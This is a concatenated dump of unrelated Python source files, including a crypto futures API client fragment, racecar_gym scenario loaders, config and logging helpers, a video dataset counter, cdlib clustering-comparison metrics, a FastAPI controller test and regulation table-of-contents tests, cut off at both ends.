params = {'instrument_id': instrument_id, 'type': type, 'order_type': order_type, 'size': size}
        if order_type == '1':  # take-profit / stop-loss parameters (at most 10 active at a time)
params['trigger_price'] = trigger_price
params['algo_price'] = algo_price
        elif order_type == '2':  # trail (trailing stop) order parameters (at most 10 active at a time)
params['callback_rate'] = callback_rate
params['trigger_price'] = trigger_price
        elif order_type == '3':  # iceberg order parameters (at most 6 active at a time)
params['algo_variance'] = algo_variance
params['avg_amount'] = avg_amount
params['price_limit'] = price_limit
        elif order_type == '4':  # time-weighted (TWAP) order parameters (at most 6 active at a time)
params['sweep_range'] = sweep_range
params['sweep_ratio'] = sweep_ratio
params['single_limit'] = single_limit
params['price_limit'] = price_limit
params['time_interval'] = time_interval
return self._request_with_params(POST, FUTURE_ORDER_ALGO, params)
# cancel_algos
def cancel_algos(self, instrument_id, algo_ids, order_type):
params = {'instrument_id': instrument_id, 'algo_ids': algo_ids, 'order_type': order_type}
return self._request_with_params(POST, FUTURE_CANCEL_ALGOS, params)
# get order_algos
def get_order_algos(self, instrument_id, order_type, status='', algo_id='', before='', after='', limit=''):
params = {'order_type': order_type}
if status:
params['status'] = status
elif algo_id:
params['algo_id'] = algo_id
if before:
params['before'] = before
if after:
params['after'] = after
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_GET_ORDER_ALGOS + str(instrument_id), params)
def get_trade_fee(self):
return self._request_without_params(GET, FUTURE_TRADE_FEE)
# get products info
def get_products(self):
return self._request_without_params(GET, FUTURE_PRODUCTS_INFO)
# get depth
def get_depth(self, instrument_id, size='', depth=''):
params = {'size': size, 'depth': depth}
return self._request_with_params(GET, FUTURE_DEPTH + str(instrument_id) + '/book', params)
# get ticker
def get_ticker(self):
return self._request_without_params(GET, FUTURE_TICKER)
# get specific ticker
def get_specific_ticker(self, instrument_id):
return self._request_without_params(GET, FUTURE_SPECIFIC_TICKER + str(instrument_id) + '/ticker')
# query trades
def get_trades(self, instrument_id, after='', before='', limit=''):
params = {}
if after:
params['after'] = after
if before:
params['before'] = before
if limit:
params['limit'] = limit
return self._request_with_params(GET, FUTURE_TRADES + str(instrument_id) + '/trades', params, cursor=True)
# query k-line
def get_kline(self, instrument_id, granularity='', start='', end=''):
params = {'granularity': granularity, 'start': start, 'end': end}
        # results are returned in reverse chronological order, i.e. from end time back to start time
return self._request_with_params(GET, FUTURE_KLINE + str(instrument_id) + '/candles', params)
        # for chronological order (start time to end time), reverse the response instead:
        # data = self._request_with_params(GET, FUTURE_KLINE + str(instrument_id) + '/candles', params)
        # return list(reversed(data))
# query index
def get_index(self, instrument_id):
return self._request_without_params(GET, FUTURE_INDEX + str(instrument_id) + '/index')
# query rate
def get_rate(self):
return self._request_without_params(GET, FUTURE_RATE)
# query estimate price
def get_estimated_price(self, instrument_id):
return self._request_without_params(GET, FUTURE_ESTIMAT_PRICE + str(instrument_id) + '/estimated_price')
    # query the platform's total open interest
def get_holds(self, instrument_id):
return self._request_without_params(GET, FUTURE_HOLDS + str(instrument_id) + '/open_interest')
# query limit price
def get_limit(self, instrument_id):
return self._request_without_params(GET, FUTURE_LIMIT + str(instrument_id) + '/price_limit')
    # query liquidation orders
def get_liquidation(self, instrument_id, status, limit='', froms='', to=''):
params = {'status': status}
if limit:
params['limit'] = limit
if froms:
params['from'] = froms
if to:
params['to'] = to
return self._request_with_params(GET, FUTURE_LIQUIDATION + str(instrument_id) + '/liquidation', params)
# query holds amount
def get_holds_amount(self, instrument_id):
return self._request_without_params(GET, HOLD_AMOUNT + str(instrument_id) + '/holds')
# query mark price
def get_mark_price(self, instrument_id):
return self._request_without_params(GET, FUTURE_MARK + str(instrument_id) + '/mark_price')
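# Illustrative usage sketch. The credentials and the instrument id are placeholders;
# the endpoint constants come from .consts and requests are issued by the Client base class.
#
# api = FutureAPI(api_key='<api-key>', api_secret_key='<secret>', passphrase='<passphrase>')
# positions = api.get_position()
# ticker = api.get_specific_ticker('<instrument-id>')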
|
22518
|
from dataclasses import dataclass
from typing import Dict, Optional
from racecar_gym.bullet import load_world, load_vehicle
from racecar_gym.tasks import Task, get_task
from racecar_gym.core import World, Agent
from .specs import ScenarioSpec, TaskSpec
def task_from_spec(spec: TaskSpec) -> Task:
task = get_task(spec.task_name)
return task(**spec.params)
@dataclass
class MultiAgentScenario:
world: World
agents: Dict[str, Agent]
@staticmethod
    def from_spec(path: str, rendering: Optional[bool] = None) -> 'MultiAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agents = dict([
(s.id, Agent(id=s.id, vehicle=load_vehicle(s.vehicle), task=task_from_spec(s.task)))
for s in spec.agents
])
return MultiAgentScenario(world=load_world(spec.world, agents=list(agents.values())), agents=agents)
@dataclass
class SingleAgentScenario:
world: World
agent: Agent
@staticmethod
    def from_spec(path: str, rendering: Optional[bool] = None) -> 'SingleAgentScenario':
spec = ScenarioSpec()
spec.load(path)
if rendering:
spec.world.rendering = rendering
agent_spec = spec.agents[0]
agent = Agent(id=agent_spec.id, vehicle=load_vehicle(agent_spec.vehicle), task=task_from_spec(agent_spec.task))
return SingleAgentScenario(world=load_world(spec.world, agents=[agent]), agent=agent)
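# Illustrative usage sketch. The spec path is a placeholder for a YAML scenario file
# describing the world and agents, as consumed by ScenarioSpec.load():
#
# scenario = SingleAgentScenario.from_spec('path/to/scenario.yml', rendering=True)
# world, agent = scenario.world, scenario.agent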
|
22545
|
import sys,os
import json
import logging as log
import socket
from collections import OrderedDict
import datetime
from platform import system as system_name # Returns the system/OS name
from subprocess import call as system_call # Execute a shell command
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Ping command count option as function of OS
param = '-n' if system_name().lower()=='windows' else '-c'
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
# Pinging
return system_call(command) == 0
# -------------------- config --------------------
def get_local_json():
    """fetches the config.json file in the local directory
    if config_<hostname>.json is found it is used over the default one
    """
    config = None
    dirname = os.path.dirname(sys.argv[0])
    if len(dirname) == 0:
        dirname = "."
    config_file = dirname + '/' + "config_" + socket.gethostname() + ".json"
    if os.path.isfile(config_file):
        print("loading:", config_file)
        with open(config_file) as config_fh:
            config = json.load(config_fh)
    else:
        config_file = dirname + '/' + "config.json"
        if os.path.isfile(config_file):
            print("loading:", config_file)
            with open(config_file) as config_fh:
                config = json.load(config_fh)
        else:
            print("Fatal error: 'config.json' not found")
    return config
# -------------------- config --------------------
def get_local_nodes(nodes_file):
nodes = json.load(open(nodes_file),object_pairs_hook=OrderedDict)
return nodes
def configure_log(logger_name):
global_config = get_local_json()
config = global_config["log"]
log_level_map = {
"Debug" :10,
"Info" :20,
"Warning" :30,
"Error" :40,
"Critical" :50
}
#if(os.path.isfile(config["logfile"])):
for handler in log.root.handlers[:]:
log.root.removeHandler(handler)
log.basicConfig( filename=config["logfile"],
level=log_level_map[config["level"]],
format='%(asctime)s %(name)s %(levelname)-8s %(message)s',
datefmt='%d %H:%M:%S'
)
log.getLogger('').addHandler(log.StreamHandler())
log.info("====> '%s' started logging with level '%s' @ '%s'"%(logger_name,config["level"],str(datetime.datetime.utcnow())))
#else:
# print("Log file not available : %s"%(config["logfile"]))
return global_config
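# Illustrative sketch of the "log" section configure_log() expects to find in
# config.json (or config_<hostname>.json); the file name and level are placeholders:
#
# {
#     "log": {
#         "logfile": "app.log",
#         "level": "Info"
#     }
# }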
|
22611
|
import argparse, os
import lib.config as config
import lib.utils as utils
def count_present_and_missing(cls, directory, metadata):
"""
Count present and missing videos for a class based on metadata.
:param cls: The class. If None, count all videos (used for testing videos - no classes).
:param directory: Directory containing the videos.
:param metadata: Kinetics metadata json.
:return: Tuple: number present videos, number of missing videos
"""
present = 0
missing = 0
for key in metadata:
if cls is None or metadata[key]["annotations"]["label"] == cls:
if os.path.isfile(os.path.join(directory, "{}.mp4".format(key))):
present += 1
else:
missing += 1
return present, missing
def main(args):
# load video classes
classes = utils.load_json(config.CLASSES_PATH)
# load lists of videos
train_metadata = utils.load_json(config.TRAIN_METADATA_PATH)
val_metadata = utils.load_json(config.VAL_METADATA_PATH)
test_metadata = utils.load_json(config.TEST_METADATA_PATH)
num_found = 0
total = 0
total_train_present = 0
total_train_missing = 0
total_val_present = 0
total_val_missing = 0
# load subset
subset = None
if args.subset:
subset = utils.load_json(args.subset)
# count train and validation videos
for cls in classes:
if subset is not None and cls not in subset:
continue
total += 1
cls_train_path = os.path.join(config.TRAIN_ROOT, cls.replace(" ", "_"))
cls_valid_path = os.path.join(config.VALID_ROOT, cls.replace(" ", "_"))
train_found = False
valid_found = False
if os.path.isdir(cls_train_path):
train_present, train_missing = count_present_and_missing(cls, cls_train_path, train_metadata)
train_found = True
total_train_present += train_present
total_train_missing += train_missing
if os.path.isdir(cls_valid_path):
valid_present, valid_missing = count_present_and_missing(cls, cls_valid_path, val_metadata)
valid_found = True
total_val_present += valid_present
total_val_missing += valid_missing
if train_found or valid_found:
num_found += 1
if args.details:
print("class {}".format(cls))
if train_found:
print("train: {} / {}".format(train_present, train_present + train_missing))
if valid_found:
print("valid: {} / {}".format(valid_present, valid_present + valid_missing))
print()
# count test videos
test_present, test_missing = count_present_and_missing(None, config.TEST_ROOT, test_metadata)
# print
train_percent_found = 0
if total_train_present > 0:
train_percent_found = (total_train_present * 100) / (total_train_present + total_train_missing)
valid_percent_found = 0
if total_val_present > 0:
valid_percent_found = (total_val_present * 100) / (total_val_present + total_val_missing)
test_percent_found = 0
if test_present > 0:
test_percent_found = (test_present * 100) / (test_present + test_missing)
print("class stats:")
print("\t{:d} / {:d} classes found".format(num_found, total))
print()
print("video stats (only for found classes):")
print("\t{:d} / {:d} ({:.2f}%) train videos found".format(
total_train_present, total_train_present + total_train_missing, train_percent_found))
print("\t{:d} / {:d} ({:.2f}%) valid videos found".format(
total_val_present, total_val_present + total_val_missing, valid_percent_found))
print("\t{:d} / {:d} ({:.2f}%) test videos found".format(
test_present, test_present + test_missing, test_percent_found))
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Print statistics about downloaded videos.")
parser.add_argument("-d", "--details", action="store_true", default=False, help="detailed stats for each found class")
parser.add_argument("-s", "--subset", help="path to a JSON file containing a subset of Kinetics classes")
parsed = parser.parse_args()
main(parsed)
|
22617
|
import shutil
import pathlib
asset_dirs = ["artifacts/main", "artifacts/build_python_version"]
pathlib.Path("distfiles").mkdir(exist_ok=True)
for asset_dir in asset_dirs:
for fname in list(pathlib.Path(asset_dir).glob('**/RobotRaconteur-*-MATLAB*')):
print(fname)
dest = pathlib.Path(fname)
shutil.copy(str(fname),"distfiles/" + dest.name)
|
22620
|
import numpy as np
from cdlib.evaluation.internal import onmi
from cdlib.evaluation.internal.omega import Omega
from nf1 import NF1
from collections import namedtuple, defaultdict
__all__ = [
"MatchingResult",
"normalized_mutual_information",
"overlapping_normalized_mutual_information_LFK",
"overlapping_normalized_mutual_information_MGH",
"omega",
"f1",
"nf1",
"adjusted_rand_index",
"adjusted_mutual_information",
"variation_of_information",
"partition_closeness_simple",
]
# MatchingResult = namedtuple("MatchingResult", ['mean', 'std'])
MatchingResult = namedtuple("MatchingResult", "score std")
MatchingResult.__new__.__defaults__ = (None,) * len(MatchingResult._fields)
def __check_partition_coverage(first_partition: object, second_partition: object):
nodes_first = {
node: None for community in first_partition.communities for node in community
}
nodes_second = {
node: None for community in second_partition.communities for node in community
}
if len(set(nodes_first.keys()) ^ set(nodes_second.keys())) != 0:
raise ValueError("Both partitions should cover the same node set")
def __check_partition_overlap(first_partition: object, second_partition: object):
if first_partition.overlap or second_partition.overlap:
raise ValueError("Not defined for overlapping partitions")
def normalized_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Normalized Mutual Information between two clusterings.
    Normalized Mutual Information (NMI) is a normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.normalized_mutual_information(louvain_communities,leiden_communities)
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import normalized_mutual_info_score
return MatchingResult(
score=normalized_mutual_info_score(first_partition_c, second_partition_c)
)
def overlapping_normalized_mutual_information_LFK(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by Lancichinetti et al. (1)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_LFK(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2009). Detecting the overlapping and hierarchical community structure in complex networks. New Journal of Physics, 11(3), 033015.
"""
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
)
)
def overlapping_normalized_mutual_information_MGH(
first_partition: object, second_partition: object, normalization: str = "max"
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by McDaid et al. using a different normalization than the original LFR one. See ref.
for more details.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:param normalization: one of "max" or "LFK". Default "max" (corresponds to the main method described in the article)
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_MGH(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2011). Normalized mutual information to evaluate overlapping community finding algorithms. arXiv preprint arXiv:1110.2515. Chicago
"""
if normalization == "max":
variant = "MGH"
elif normalization == "LFK":
variant = "MGH_LFK"
else:
raise ValueError(
"Wrong 'normalization' value. Please specify one among [max, LFK]."
)
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
variant=variant,
)
)
def omega(first_partition: object, second_partition: object) -> MatchingResult:
"""
Index of resemblance for overlapping, complete coverage, network clusterings.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.omega(louvain_communities,leiden_communities)
:Reference:
    1. <NAME>, <NAME>, and <NAME>. 2012. `Using the omega index for evaluating abstractive community detection. <https://pdfs.semanticscholar.org/59d6/5d5aa09d789408fd9fd3c009a1b070ff5859.pdf/>`_ In Proceedings of Workshop on Evaluation Metrics and System Comparison for Automatic Summarization. Association for Computational Linguistics, Stroudsburg, PA, USA, 10-18.
"""
__check_partition_coverage(first_partition, second_partition)
first_partition = {k: v for k, v in enumerate(first_partition.communities)}
second_partition = {k: v for k, v in enumerate(second_partition.communities)}
om_idx = Omega(first_partition, second_partition)
return MatchingResult(score=om_idx.omega_score)
def f1(first_partition: object, second_partition: object) -> MatchingResult:
"""
    Compute the average F1 score of the optimal community matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.f1(louvain_communities,leiden_communities)
:Reference:
    1. <NAME>., <NAME>., & <NAME>. (2016). `A novel approach to evaluate community detection algorithms on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_ In Complex Networks VII (pp. 133-144). Springer, Cham.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(
score=results["details"]["F1 mean"][0], std=results["details"]["F1 std"][0]
)
def nf1(first_partition: object, second_partition: object) -> MatchingResult:
"""
    Compute the Normalized F1 score of the optimal community matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.nf1(louvain_communities,leiden_communities)
:Reference:
    1. <NAME>., <NAME>., & <NAME>. (2016). `A novel approach to evaluate community detection algorithms on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_
    2. <NAME>. (2017). `RDyn: graph benchmark handling community dynamics. Journal of Complex Networks. <https://academic.oup.com/comnet/article-abstract/5/6/893/3925036?redirectedFrom=PDF/>`_ 5(6), 893-912.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(score=results["scores"].loc["NF1"][0])
def adjusted_rand_index(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Rand index adjusted for chance.
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_index(a, b) == adjusted_rand_index(b, a)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_rand_index(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., & <NAME>. (1985). `Comparing partitions. <https://link.springer.com/article/10.1007/BF01908075/>`_ Journal of classification, 2(1), 193-218.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_rand_score
return MatchingResult(
score=adjusted_rand_score(first_partition_c, second_partition_c)
)
def adjusted_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Adjusted Mutual Information between two clusterings.
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_mutual_information(louvain_communities,leiden_communities)
:Reference:
1. <NAME>., <NAME>., & <NAME>. (2010). `Information theoretic measures for clusterings comparison: Variants, properties, normalization and correction for chance. <http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf/>`_ Journal of Machine Learning Research, 11(Oct), 2837-2854.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_mutual_info_score
return MatchingResult(
score=adjusted_mutual_info_score(first_partition_c, second_partition_c)
)
def variation_of_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Variation of Information among two nodes partitions.
$$ H(p)+H(q)-2MI(p, q) $$
    where MI is the mutual information, H the partition entropy and p, q are the two partitions being compared
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.variation_of_information(louvain_communities,leiden_communities)
:Reference:
1. Meila, M. (2007). `Comparing clusterings - an information based distance. <https://www.sciencedirect.com/science/article/pii/S0047259X06002016/>`_ Journal of Multivariate Analysis, 98, 873-895. doi:10.1016/j.jmva.2006.11.013
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
n = float(sum([len(c1) for c1 in first_partition.communities]))
sigma = 0.0
for c1 in first_partition.communities:
p = len(c1) / n
for c2 in second_partition.communities:
q = len(c2) / n
r = len(set(c1) & set(c2)) / n
if r > 0.0:
sigma += r * (np.log2(r / p) + np.log2(r / q))
return MatchingResult(score=abs(sigma))
def partition_closeness_simple(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Community size density closeness.
Simple implementation that does not leverage kernel density estimator.
    $$ S_G(A,B) = \frac{1}{2} \sum_{i=1}^{r}\sum_{j=1}^{s} \min\left(\frac{n^a(x^a_i)}{N^a}, \frac{n^b(x^b_j)}{N^b}\right) \delta(x_i^a, x_j^b) $$
where:
$$ N^a $$ total number of communities in A of any size;
$$ x^a $$ ordered list of community sizes for A;
$$ n^a $$ multiplicity of community sizes for A.
(symmetrically for B)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.partition_closeness_simple(louvain_communities,leiden_communities)
:Reference:
1. Dao, Vinh-Loc, <NAME>, and <NAME>. "Estimating the similarity of community detection methods based on cluster size distribution." International Conference on Complex Networks and their Applications. Springer, Cham, 2018.
"""
coms_a = sorted(list(set([len(c) for c in first_partition.communities])))
freq_a = defaultdict(int)
for a in coms_a:
freq_a[a] += 1
freq_a = [freq_a[a] for a in sorted(freq_a)]
n_a = sum([coms_a[i] * freq_a[i] for i in range(0, len(coms_a))])
coms_b = sorted(list(set([len(c) for c in second_partition.communities])))
freq_b = defaultdict(int)
for b in coms_b:
freq_b[b] += 1
freq_b = [freq_b[b] for b in sorted(freq_b)]
n_b = sum([coms_b[i] * freq_b[i] for i in range(0, len(coms_b))])
closeness = 0
for i in range(0, len(coms_a)):
for j in range(0, len(coms_b)):
if coms_a[i] == coms_b[j]:
closeness += min(
(coms_a[i] * freq_a[i]) / n_a, (coms_b[j] * freq_b[j]) / n_b
)
closeness *= 0.5
return MatchingResult(score=closeness)
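# Illustrative sketch: every metric above returns a MatchingResult, so callers read the
# score (and, where available, the standard deviation) as attributes. The two
# NodeClustering objects are assumed to be built as in the docstring examples.
#
# res = normalized_mutual_information(louvain_communities, leiden_communities)
# print(res.score)
# f1_res = f1(louvain_communities, leiden_communities)
# print(f1_res.score, f1_res.std)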
|
22622
|
from typing import Optional
import pytest
from fastapi import FastAPI, Header
from fastapi.testclient import TestClient
from meiga import BoolResult, Failure, isFailure, isSuccess
from petisco import NotFound, assert_http
from petisco.extra.fastapi import FastAPIController
app = FastAPI(title="test-app")
result_from_expected_behavior = {
"success": isSuccess,
"failure_generic": isFailure,
"failure_not_found": Failure(NotFound()),
}
class MyController(FastAPIController):
def execute(self, expected_behavior: str) -> BoolResult:
return result_from_expected_behavior.get(expected_behavior, isSuccess)
@app.get("/test")
def entry_point(x_behavior: Optional[str] = Header("success")):
return MyController().execute(x_behavior)
@pytest.mark.unit
@pytest.mark.parametrize(
"behavior,expected_status_code",
[("success", 200), ("failure_generic", 500), ("failure_not_found", 404)],
)
def test_fastapi_app_with_controller_should_return_expected_values(
behavior, expected_status_code
):
with TestClient(app) as client:
response = client.get("/test", headers={"x-behavior": behavior})
assert_http(response, expected_status_code)
|
22629
|
from Point import Point
import Constant as c
from GeometryMath import bisector_point
class Bisector(Point):
def __init__(self, item):
"""Construct Bisector."""
Point.__init__(self, item)
self.item["sub_type"] = c.Point.Definition.BISECTOR
def tikzify(self):
return '\\tkzDefLine[bisector](%s,%s,%s)\\tkzGetPoint{%s}' % (self.item["definition"]["A"],
self.item["definition"]["B"],
self.item["definition"]["C"],
self.get_id())
def recompute_canvas(self, items, window, width, height):
A = items[self.depends_on()[0]].get_canvas_coordinates()
B = items[self.depends_on()[1]].get_canvas_coordinates()
C = items[self.depends_on()[2]].get_canvas_coordinates()
self.set_canvas_coordinates(*bisector_point(A, B, C))
def __str__(self):
return "Bisector point (%s) of angle %s"\
% (self.item["id"], self.item["definition"]["A"]+self.item["definition"]["B"]+self.item["definition"]["C"])
def definition_builder(self, data, items=None):
if len(data) == 3:
return dict(zip(["A", "B", "C"], data))
def parse_into_definition(self, arguments, items):
# arguments length condition
if len(arguments) != 3:
return None
# all arguments are members of the regular expression for argument name
if not all(map(lambda x: self.name_pattern(x), arguments)):
return None
# all arguments are items that already exist
if not all(map(lambda x: x in items, arguments)):
return None
# the type of all arguments is of a certain type
if not all(map(lambda x: items[x].item["type"] == 'point', arguments)):
return None
# self-reference condition (self-reference is not permitted)
if self.get_id() in arguments:
return None
# condition for cross reference
for id in arguments:
deep_depends = items[id].deep_depends_on(items)
if self.get_id() in deep_depends:
return None
return self.definition_builder(arguments)
@staticmethod
def static_patterns():
return ["ppp"]
def patterns(self):
return ["ppp"]
|
22663
|
from ._base import *
DEBUG = False
WEBSITE_URL = "https://example.com" # without trailing slash
MEDIA_URL = f"{WEBSITE_URL}/media/"
|
22689
|
from unittest import TestCase
from regulations.generator.layers.toc_applier import *
class TableOfContentsLayerTest(TestCase):
def test_section(self):
toc = TableOfContentsLayer(None)
el = {}
toc.section(el, {'index': ['1']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', '2', '3']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', 'B']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', 'Interpretations']})
self.assertEqual({}, el)
toc.section(el, {'index': ['1', '2'], 'title': '1.2 - Awesome'})
self.assertEqual(el, {
'is_section': True,
'section_id': '1-2',
'label': '1.2',
'sub_label': 'Awesome'
})
toc.section(el, {'index': ['2', '1'], 'title': '2.1Sauce'})
self.assertEqual(el, {
'is_section': True,
'section_id': '2-1',
'label': '2.1',
'sub_label': 'Sauce'
})
def test_appendix_supplement(self):
toc = TableOfContentsLayer(None)
el = {}
toc.appendix_supplement(el, {'index': ['1']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {'index': ['1', '2', '3']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {'index': ['1', 'B', '3']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {'index': ['1', 'Interp', '3']})
self.assertEqual({}, el)
toc.appendix_supplement(el, {
'index': ['1', 'B'],
'title': 'Appendix B - Bologna'})
self.assertEqual(el, {
'is_appendix': True,
'is_first_appendix': True,
'label': 'Appendix B',
'sub_label': 'Bologna',
'section_id': '1-B'
})
el = {}
toc.appendix_supplement(el, {
'index': ['204', 'A'],
'title': 'Appendix A to Part 204 - Model Forms'})
self.assertEqual(el, {
'is_appendix': True,
'is_first_appendix': True,
'label': 'Appendix A to Part 204',
'sub_label': 'Model Forms',
'section_id': '204-A'
})
el = {}
toc.appendix_supplement(el, {
'index': ['1', 'Interp'],
'title': 'Supplement I to 8787 - I am Iron Man'})
self.assertEqual(el, {
'is_supplement': True,
'label': 'Supplement I to 8787',
'sub_label': 'I am Iron Man',
'section_id': '1-Interp'
})
def test_apply_layer_url(self):
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']}]})
result = toc.apply_layer('100')
self.assertEqual('#100-1', result[1][0]['url'])
toc.sectional = True
toc.version = 'verver'
result = toc.apply_layer('100')
self.assertTrue('100-1/verver#100-1' in result[1][0]['url'])
def test_apply_layer_compatibility(self):
toc = TableOfContentsLayer({'100': [
{'title': '100.1 Intro', 'index': ['100', '1']},
{'title': 'Appendix A', 'index': ['100', 'A']},
{'title': 'Supplement I', 'index': ['100', 'Interp']}]})
_, result = toc.apply_layer('100')
self.assertEqual(3, len(result))
toc = TableOfContentsLayer({
